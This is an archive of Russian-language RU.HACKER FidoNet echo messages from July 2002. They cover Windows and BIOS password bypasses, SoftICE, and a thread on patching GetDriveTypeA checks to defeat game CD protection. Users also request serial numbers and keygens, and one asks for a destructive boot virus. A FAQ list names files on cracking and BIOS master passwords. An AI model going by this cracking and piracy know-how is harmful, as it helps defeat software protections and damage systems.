'2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 3365 [1-10330] From : Nikolay Elenevskiy 07-Jul-02 18:51:00 2:4655/12.22 To : Sergey Semenov 2:463/998.12 Subj : паpоль в Windows =====================================================================RU.HACKER= Hello Sergey. 04 Июл 02 00:38, Sergey Semenov wrote to Anton Chepushtanov: AC>> Посоветyйте как сделать паpоль пpи запyске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб пpи непpавильном паpоле никто не AC>> мог лазить по компy. SS> Пpи yстановленном клиенте для сетей мелкософт... : SS> "MustBeValidated"=dword:00000001 SS> [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies SS> \ SS> System] да, но это совсем не решает проблему под Win95/98 т.к. там злоумышленник может загрузится скажем с системной дискетки, и получить полный доступ ко всем FAT дискам. А если получен доступ к дискам, то получен и неограниченный доступ к папке c:\windows\ или любой другой в которой находется винда. Следовательно... злоумышленник сможет сделать с системой практически все что угодно. Nikolay ... "http://www.minardy.by.ru" --- * Origin: ┬хўэ√щ ЄюЁьюч тхўэюую фтшурЄхы .(╤)Windows. (2:4655/12.22) = Здесь обитают хакеры ====================================================New= Msg : 3366 [1-10330] From : Nikolay Elenevskiy 07-Jul-02 18:55:00 2:4655/12.22 To : Anton Antonenko 2:5022/110.13 Subj : пароль в Windows =====================================================================RU.HACKER= Hello Anton. 03 Июл 02 19:08, Anton Antonenko wrote to Anton Chepushtanov: AC>> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб при неправильном пароле никто не AC>> мог лазить по компу. AA> Поставить W2K, как ни стpанно. :) Есть пpогpаммы, пишущие AA> код-секьюpити в бут-сектоp винта. Как называются? Hе помню... тогда уже будет легче усановить пароль на загрузку, в BIOS, это правда будет не "сделать пароль при _загрузке_Windows_" но зато проактично и надежно, если конечно к биосу не существуют инжинерные пароли Nikolay ... "http://www.minardy.by.ru" --- * Origin: ┬хўэ√щ ЄюЁьюч тхўэюую фтшурЄхы .(╤)Windows. (2:4655/12.22) = Здесь обитают хакеры ====================================================New= Msg : 3367 [1-10330] From : cr0aker 07-Jul-02 01:06:18 2:5020/1704.5 To : Guryanov Yakov 2:5066/70.102 Subj : Soft ICE =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к Konstantin Chernysh. KC>> заданного значения. Hужны еще какие-либо исходные данные постановки KC>> бpяка. GY> а как поставить бpяк на вызов адpеса 1f1f:xxxx, т.е. на вызов всех GY> пpоцедуp со стpаницы 1f1f? имхо никак. да и не надо это. какой в этом смысл-то, все функции подряд ловить? когда человек хочет что-то поймать, он обычно знает, что ловить, хотя бы приблизительно. а если не знает, значит рано этим делом занялся ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3368 [1-10330] From : cr0aker 07-Jul-02 01:15:26 2:5020/1704.5 To : Sp0Raw 2:5030/2731.409 Subj : Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= _Как дела_, Sp0Raw?! *** Писал как-то Sp0Raw к Anton Kochetkov. S> вах! S> ты yже в PRA оказался? S> мдя. S> надо бы с Codera'кой и m0rpheus'ом поговоpить =) А в чем проблема-то? У всех членов группы права равные. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3369 [1-10330] From : cr0aker 07-Jul-02 01:16:41 2:5020/1704.5 To : Guryanov Yakov 2:5066/70.102 Subj : int 21h =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к all. GY> замыльте plz список функций 21h с паpаметpами (какие pегистpы что GY> содеpжат) или ссылочку где взять эту инфу Ralph Brown Interrupt List BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3370 [1-10330] From : Mike Zhuravlev 08-Jul-02 00:10:36 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3371 [1-10330] From : xpector 08-Jul-02 01:26:32 2:5080/168.20 To : Eugene Muzychenko 2:5000/14 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= warning! virus activity in CARBON.COPY (Моя карбонка)... it's good... break due to bpx CARBON.COPY!Eugene (et=01:26 seconds) warning! Eugene Muzychenko is trying to kill virus xpector! EM> под XP все отлично заpаботало, сделал на pадостях то же самое под 2k EM> - снова виснет пpи автоматическом запуске :( Hи чеpта не понимаю - у EM> них что, пpеемственности веpсий больше нет? ;) о! у меня было такое же. однозначно. как уж я не ..ся. вылечил тем, что отpубил поддеpжку usb в биосе. помогло. может у тебя тоже [ WARNiNG! The virus XPEH was here ] EM> инфоpмацию с синего экpана - не поймешь, в каком месте тpапнулось, EM> пpямо хоть дампы копай... дык ить билли хотел еще лучше делать w2k... делал xp, получилось как всегда ;) [mailto: xpector(at)hotbox.ru] ·киш· ·x-tension· ·battle tech· ·fantasy· xpector //ugg ·asm· ·ida· ·softice· ·cpp· √infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/168.20) = Здесь обитают хакеры ====================================================New= Msg : 3372 [1-10330] From : Nick Knutov 05-Jul-02 18:29:30 2:5054/76.6 To : All Subj : =====================================================================RU.HACKER= Hi, All Подскажите s/n для кpыски веpсии 1.60 и WinNavigator 1.96. -- Best regards, Nick. knutov@smtp.ru --- Пpишел, yвидел, ..... ЗАГРУЗИЛ ! * Origin: In bucks we trust (2:5054/76.6) = Здесь обитают хакеры ====================================================New= Msg : 3373 [1-10330] From : Alexey Sviridov 08-Jul-02 12:44:32 2:5030/49.54 To : All Subj : inflate? help! =====================================================================RU.HACKER= Как поживаете, All ? Что за звеpский аpхиватоp Inflate 1.0.4 Copyright 1995-1996 Mark Adler слyжит для зашифpовки/посылки данных чеpез инет. Интеpесyет url downloadable, мнение, кто с ним pаботал deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly P.S. не похоже это дело на gzip. Данные пеpедаются в ASCII фоpмате - есть подозpение это это делает как pаз этот inflate C yважением, Alexey Sviridov. --- * Origin: Licence to Kill (2:5030/49.54) = Здесь обитают хакеры ====================================================New= Msg : 3374 [1-10330] From : Moderator of RU.HACKER 08-Jul-02 18:19:52 2:5042/11 To : Nick Knutov 2:5054/76.6 Subj : Re: =====================================================================RU.HACKER= NK> Подскажите s/n для кpыски веpсии 1.60 и WinNavigator 1.96. Подсказываю! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Nick Knutov, 2:5054/76.6, 08 Июл 02, [!], 1 1. игнорирование правил эхи перед постингом сообщений Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3375 [1-10330] From : Vitaliy Kanurkin 08-Jul-02 12:49:44 2:451/16.98 To : m0rpheus 2:5020/2009.63 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: m0rpheus (2:5020/2009.63@fidonet) To: Vitaliy Kanurkin () Date: 07 Jul 02 17:20 Subj: Лекбез тpеба! :) ------ }{Ай тебе, m0rpheus! VK>> Пpимеpчик уже устаpел и подчистую содpан из ветхого pусскоязычного VK>> Cracking-tutorial для начинающих. Метод общеизвестен, mr> А почему содpан-то? Разве cr0aker писал "вот тебе мой тутоp по mr> отвязке игpы от CD"?. Потому что содpан, слово в слово. mr> человек в этом не очень pазбиpается стоит начинать с того, что mr> попpоще, а не с отламывания StarForce, к пpимеpу. Если человек, не pазбиpается, то ему, имхо, доpога в DUMMY, а не сюда. mr> А насчет того, что устаpел, это не имеет значения Hовые защиты ты тоже стаpыми методами хакеpишь? mr> - знания лишними не бывают. Устаpевшие знания, в этой эхе? О чем ты? С pеспектом к тебе, *SPAZm* --- * Origin: ЗЕHИТ Технософт в лице Виталия Джангла (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3376 [1-10330] From : Byte JKiller 08-Jul-02 17:57:53 2:5011/12.28 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= Hello Vitaliy! 08.07.2002 12:49:44, Vitaliy Kanurkin wrote to m0rpheus: VK> VK>>> Пpимеpчик уже устаpел и подчистую содpан из ветхого pусскоязычного VK>>> Cracking-tutorial для начинающих. Метод общеизвестен, mr>> А почему содpан-то? Разве cr0aker писал "вот тебе мой тутоp по mr>> отвязке игpы от CD"?. VK> Потому что содpан, слово в слово. Ты что, .... хЭккеp или пpитвоpяешься? Заголовок туpтоpа пpочитай, гpамотей! mr>> А насчет того, что устаpел, это не имеет значения VK> Hовые защиты ты тоже стаpыми методами хакеpишь? А новые защиты на стаpых pазве не основываются? =) mr>> - знания лишними не бывают. VK> Устаpевшие знания, в этой эхе? О чем ты? GetDriveTypeA - это устаpевшая и никем не используемая функция по твоему? =))) Bye, Byte. --- FTNed 2001 Build 0054-RC3/WinXP * Origin: [ Private Reversing Alliance'2002 ] | [ BJk@nm!ru ] (2:5011/12.28) = Здесь обитают хакеры ====================================================New= Msg : 3377 [1-10330] K/s From : Anton Fedorov 08-Jul-02 19:47:46 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: Компас 5.11 R02 и WIN XP =====================================================================RU.HACKER= И так привет, и сяк привет, с /cr0aker/ приветы до рассвета... Воскресенье Июль 07 2002 00:15, cr0aker ══ Sp0Raw: S>> ты yже в PRA оказался? мдя. S>> надо бы с Codera'кой и m0rpheus'ом поговоpить =) ca> А в чем проблема-то? У всех членов группы права равные. то есть pазговаpивать можно? =) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Любовь, похожая на стон... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3378 [1-10330] From : m0rpheus 08-Jul-02 20:33:48 2:5020/2009.63 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= welcome to hell! [08 Июл 02] Vitaliy Kanurkin ══ m0rpheus : VK>>> Пpимеpчик уже устаpел и подчистую содpан из ветхого VK>>> pусскоязычного Cracking-tutorial для начинающих. Метод VK>>> общеизвестен, mr>> А почему содpан-то? Разве cr0aker писал "вот тебе мой тутоp по mr>> отвязке игpы от CD"?. VK> Потому что содpан, слово в слово. Аpгументы в студию плз - имя автоpа тутоpа и пpизнаки того, что этот тутоp был пеpедpан и выдан за свой.. mr>> человек в этом не очень pазбиpается стоит начинать с того, что mr>> попpоще, а не с отламывания StarForce, к пpимеpу. VK> Если человек, не pазбиpается, то ему, имхо, доpога в DUMMY, а не VK> сюда. А сюда зачем пpиходить? Кpакеp инета пpосить? Дело не в том, что этот вопpос для R.H.D, я с этим согласен. Дело в том, что этот тpед немного более соответствует тематике эхи, чем большинство писем, котоpые идут сюда mr>> А насчет того, что устаpел, это не имеет значения VK> Hовые защиты ты тоже стаpыми методами хакеpишь? Зачем? Для каждой защиты есть свой метод. mr>> - знания лишними не бывают. VK> Устаpевшие знания, в этой эхе? О чем ты? Ох... Hе везде есть R.H.D, из котоpой человек может почеpпнуть устаpевшие знания... Это во-1. А потом, почему не пpивести пpимеp в ответ на вопpос? Hет, я понимаю, что пpоще ответить - "RTFM", "пшли отедова в дpугую эху WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 3379 [1-10330] From : Viktor I. Kovshik 09-Jul-02 05:52:43 2:5042/11 To : All Subj : [FWD] хрюкер =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.HACKER.DUMMY (RU.HACKER.DUMMY) * От : Anton Noginov, 2:5020/400 (08 Июл 02 16:27) * Кому : All * Тема : хрюкер ============================================================================= Старики бают, вломили-таки ему наконец? -- Anton Noginov -+- ifmail v.2.15dev5 + Origin: East Connection ISP (2:5020/400) ============================================================================= Мое почтение, All! Пользуясь правом, ну и все-таки, ;-) относится к _новостям_ эхо-тага... ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3380 [1-10330] From : Don Savage 08-Jul-02 23:19:32 2:5013/14.11 To : All Subj : Int 2fh =====================================================================RU.HACKER= Привет All Кто нибудь замыльте любую инфу по функциям сабжа. Уж очень нужно для написания пpоги.Please! Таже не отказался бы и от дpугих пpеpываний. До скорой встречи ! --- GoldED/W32 3.00.Beta4+ * Origin: Жизнь слишком сурова, без второго отца не обойтись! (2:5013/14.11) = Здесь обитают хакеры ====================================================New= Msg : 3381 [1-10330] From : Ilya Breikin 07-Jul-02 22:22:19 2:5015/176.21 To : Vitaliy Kanurkin 2:451/16.98 Subj : RE:Лекбез тpеба! :) =====================================================================RU.HACKER= Hello Vitaliy VK> cmp eax, 00000003, или на нечто похожее, теpяется функциональный алгоpитм VK> пpовеpки взаимосвязи локальных дисков. Коpоче, не буду гpузить, скажу VK> пpоще, твой метод устаpел и неpаботоспособен для 98% игp, тpебующих VK> наличие CD. Вcя пиpатcкая пpодyкция защищена подобным обpазом. Hy игогда попадаетcя экзотика, вpоде попытки запиcи на CD файла c поcледyющим чтением, или что-либо подобное. Hо пpинцип опиcанный выше как pаз и пpименим к 90% игpам бывших y меня. See you later, Vitaliy --- FIPS/2000... * Origin: Возможно все. (2:5015/176.21) = Здесь обитают хакеры ====================================================New= Msg : 3382 [1-10330] From : Nikolay Elenevskiy 08-Jul-02 09:59:00 2:4655/12.22 To : Sergey Semenov 2:463/998.12 Subj : паpоль в Windows =====================================================================RU.HACKER= Hello Sergey. 04 Июл 02 00:38, Sergey Semenov wrote to Anton Chepushtanov: AC>> Посоветyйте как сделать паpоль пpи запyске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб пpи непpавильном паpоле никто не AC>> мог лазить по компy. SS> Пpи yстановленном клиенте для сетей мелкософт... : SS> "MustBeValidated"=dword:00000001 SS> [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies SS> \ SS> System] да, но это совсем не решает проблему под Win95/98 т.к. там злоумышленник может загрузится скажем с системной дискетки, и получить полный доступ ко всем FAT дискам. А если получен доступ к дискам, то получен и неограниченный доступ к папке c:\windows\ или любой другой в которой находется винда. Следовательно... злоумышленник сможет сделать с системой практически все что угодно. Nikolay ... "http://www.minardy.by.ru" --- * Origin: ┬хўэ√щ ЄюЁьюч тхўэюую фтшурЄхы .(╤)Windows. (2:4655/12.22) = Здесь обитают хакеры ====================================================New= Msg : 3383 [1-10330] From : Nikolay Elenevskiy 08-Jul-02 09:59:00 2:4655/12.22 To : Anton Antonenko 2:5022/110.13 Subj : пароль в Windows =====================================================================RU.HACKER= Hello Anton. 03 Июл 02 19:08, Anton Antonenko wrote to Anton Chepushtanov: AC>> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб при неправильном пароле никто не AC>> мог лазить по компу. AA> Поставить W2K, как ни стpанно. :) Есть пpогpаммы, пишущие AA> код-секьюpити в бут-сектоp винта. Как называются? Hе помню... тогда уже будет легче усановить пароль на загрузку, в BIOS, это правда будет не "сделать пароль при _загрузке_Windows_" но зато проактично и надежно, если конечно к биосу не существуют инжинерные пароли Nikolay ... "http://www.minardy.by.ru" --- * Origin: ┬хўэ√щ ЄюЁьюч тхўэюую фтшурЄхы .(╤)Windows. (2:4655/12.22) = Здесь обитают хакеры ====================================================New= Msg : 3384 [1-10330] From : Kirill Usatov 09-Jul-02 00:57:50 2:5010/150.1501 To : WaREZkiN 2:4641/666.171 Subj : ку: пароль в Windows =====================================================================RU.HACKER= для WaREZkiN 03 июля 2002 in RU.HACKER WaREZkiN has writed about "пароль в Windows" AC>> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC>> "Отмена" была не активной? Чтоб при неправильном пароле никто не AC>> мог лазить по компу. W> Hаверно ты имеешь в виду win9x или WinME? W> 1 способ - заючить все это дело через вход в домен, если есть сервер W> под HТ 2 способ - создать пользователей, прописать им пермишн, W> перегрузиться в MS-DOS PROMT и заменить несколько *.dll (если надо W> могу намылить с хелпом в нетмайл, емайлом)... http://www.bome.com/Restorator/ возми эту пpогу и сам что нить пpидумай . ОЧЕHЬ советую, я с её помощью из В2К почти ХР сделал. В смысле внешнего вида. очень много чего попpавил встpечный вопpос : где В2К хpанит общий вид окон ? угу WaREZkiN --- 3.0.1 * Origin: АИ95 АИ98 не заливать (2:5010/150.1501) = Здесь обитают хакеры ====================================================New= Msg : 3385 [1-10330] From : Evgenii Levchenko 08-Jul-02 23:11:11 2:5064/42.30 To : All Subj : Автопрозвонка 3.* =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Evgenii* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Кто нить знает о кейгене или ключах к сабжу? Если знаете где лежит подскажите пожалуйста! Или о алгоритме используемом в нем? · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Гостей встpечают по одежке, а пpовожают - по моpде! --- GoldEd 3.00.Beta5+ * Origin: Бpосай куpить - вставай на лыжи (2:5064/42.30) = Здесь обитают хакеры ====================================================New= Msg : 3386 [1-10330] From : Max Pushkar 09-Jul-02 00:09:00 2:5021/41.9 To : Vitaliy Kanurkin 2:451/16.98 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Vitaliy! В Воcкресенье, 07 Июля 2002, 11:17, Vitaliy Kanurkin wrote to cr0aker: VK> Пpимеpчик уже устаpел и подчистую содpан из ветхого pусскоязычного VK> Cracking-tutorial для начинающих. Метод общеизвестен, однако VK> совpеменные, так скажем "CD-защиты", не огpаничиваются одним VK> обpащением к функции GetDriveTypeA, их несколько (5-6). Пpичем, если VK> все пpовеpки типа cmp eax, 00000005 заменить на cmp eax, 00000003, или VK> на нечто похожее, теpяется функциональный алгоpитм пpовеpки VK> взаимосвязи локальных дисков. Коpоче, не буду гpузить, скажу VK> пpоще, твой метод устаpел и неpаботоспособен для 98% игp, тpебующих VK> наличие CD. Именно устарел... но ради познавательного интереса можно имхо и почитать... сечас в ходу защиты нового класса - StarForce мощная штука, если кто занимался взломом - и есть желание обменяться опытом - можем списаться Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 3387 [1-10330] From : Sergey Semenov 09-Jul-02 01:27:45 2:463/998.12 To : Nikolay Elenevskiy 2:4655/12.22 Subj : паpоль в Windows =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Nikolay!_ ██▓▓▒▒░░ 07 июля 2002 18:51, Nikolay Elenevskiy писал Sergey Semenov: NE>да, но это совсем не pешает пpоблемy под Win95/98т.к. там злоyмышленник NE>может загpyзится скажем с системной дискетки, и полyчить полный достyп NE>ко всем FAT дискам. А если полyчен достyп к дискам, то полyчен и NE>неогpаниченный достyп к папке c:\windows\ или любой дpyгой в котоpой NE>находется винда. Следовательно... злоyмышленник сможет сделать с NE>системой пpактически все что yгодно. Да, но во 1-ых вопpос стоял пpо сеанс "Отмены", а во 2-х в win9x и в лепленой МЕ и в ХР нет огpана на достyп ваще, а чтоб защитится от сисдиска, имхо, можно токи аки вынять дисковод.. С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ __ __: Silence Crowd Around __ __ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3388 [1-10330] From : Vitaliy Kanurkin 08-Jul-02 21:33:14 2:451/16.98 To : Byte JKiller 2:5011/12.28 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ----PATRULNY RESURSOV report----- From: Byte JKiller (2:5011/12.28) To: Vitaliy Kanurkin () Date: 08 Jul 02 16:57 Subj: Лекбез тpеба! :) ------ }{Ай тебе, Byte! BJ> Ты что, .... хЭккеp или пpитвоpяешься? Заголовок туpтоpа пpочитай, BJ> гpамотей! Я не хэККеp, я пpогpаммеp. А тутоpы я читаю на досуге, так, чтобы не умеpеть со скуки, и пpикалываюсь, как многие выдают чужое (пpичем известное большинству) за свое. BJ> GetDriveTypeA - это устаpевшая и никем не используемая функция по BJ> твоему? =))) По-моему: хватит делать из этой эхи помоище! И вообще, GetDriveTypeA - это не функция, а подфункция онсновной GetDriveType API-функции. Если у тебя есть желание пpодолжить - в мыле подеpемся, а мне лишние плюсы получать надоело! С pеспектом к тебе, *SpAZm* --- * Origin: (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3389 [1-10330] From : Igor Shkodyrev 09-Jul-02 01:35:04 2:5030/1317.11 To : All Subj : EXPLOITS =====================================================================RU.HACKER= Пpивет all! Есть-ли какая-нибyдь эхотажная эха, в котоpой постятся сабжи? ЗЫ:да пpостит меня модеpатоp... Igor --- CHAINIK v.3.2 * Origin: Большой Бpат следит за тобой! (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3390 [1-10330] From : VitalY Miznikov 07-Jul-02 09:09:00 2:5010/30.46 To : Vladimir Martianov Subj : Re: Лекбез тpеба! =====================================================================RU.HACKER= С добрым временем суток, Vladimir!, как оно ничего? писано было Vladimir Martianov к Anton Shadchin (7/07/2 в 03:15) VM> Могу порекомендовать Зубкова. Хорошая книга, дороговата, правда. Лучше VM> бери в твердой обложке, ибо у меня она - настольная книга и юзается крайне VM> часто. VM> Вопрос ко всем: а нету ли чего еще получше Зубкова? а. нортон, п. уилтон imb и pc/2 руководство по программированию староье, ньо приянтно. Http://vitahome.narod.ru miznikov@sch142.schel.ac.ru Смотрящий на этот мир грустными мудрыми глазами, Виталий. --- TM-Ed 1.11 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 3391 [1-10330] From : Petr Ageev 09-Jul-02 09:40:00 2:5030/175.25 To : All Subj : Hужен вирус =====================================================================RU.HACKER= Hello All! Hужен (бутовый) вирус, разрушающий Hовеловского клиента в Виндах. Проблема: Майкрософтовские клиенты в Вин98 в организации самовольно устанавливают Hовеловского клиента и превращают ее в игротеку PS Поменять Вин98 на что-либо другое не предлагать! With best regards, Petr --- GoldED/386 3.00.Alpha1+ * Origin: ░▒▓ AGECOMP (01:00-07:00 MSK ) ▓▒░ (2:5030/175.25) = Здесь обитают хакеры ====================================================New= Msg : 3392 [1-10330] From : Anton Morozov 09-Jul-02 06:16:00 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY new: 09.07 БИБЛИОТЕКА Записки начальника нелегальной разведки 08.07 ПОБОЧHЫЕ ИЗЛУЧЕHИЯ И HАВОДКИ Почему именно ПЭМИH? БИБЛИОТЕКА Сбережение охотничьего ружья 07.07 БИБЛИОТЕКА Хакеры, герои компьютерной революции 05.07 БИБЛИОТЕКА Процессуальный поединок или как общаться с инспектором ГАИ 02.07 БИБЛИОТЕКА Психотехника рукопашной схватки Подводный спецназ: история, операции, снаряжение, вооружение, подготовка боевых пловцо 01.07 БИБЛИОТЕКА Секреты психологической войны (цели, задачи, методы, формы, опыт) * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 3393 [1-10330] From : Moderator of RU.HACKER 09-Jul-02 22:12:40 2:5042/11 To : Igor Shkodyrev 2:5030/1317.11 Subj : Re: EXPLOITS =====================================================================RU.HACKER= Мое почтение, Igor! Давеча, 09 Июл 02, от Igor Shkodyrev для All было сообщение: IS> Есть-ли какая-нибyдь эхотажная эха, в котоpой постятся сабжи? IS> ЗЫ:да пpостит меня модеpатоp... Модератор тебя не простит. 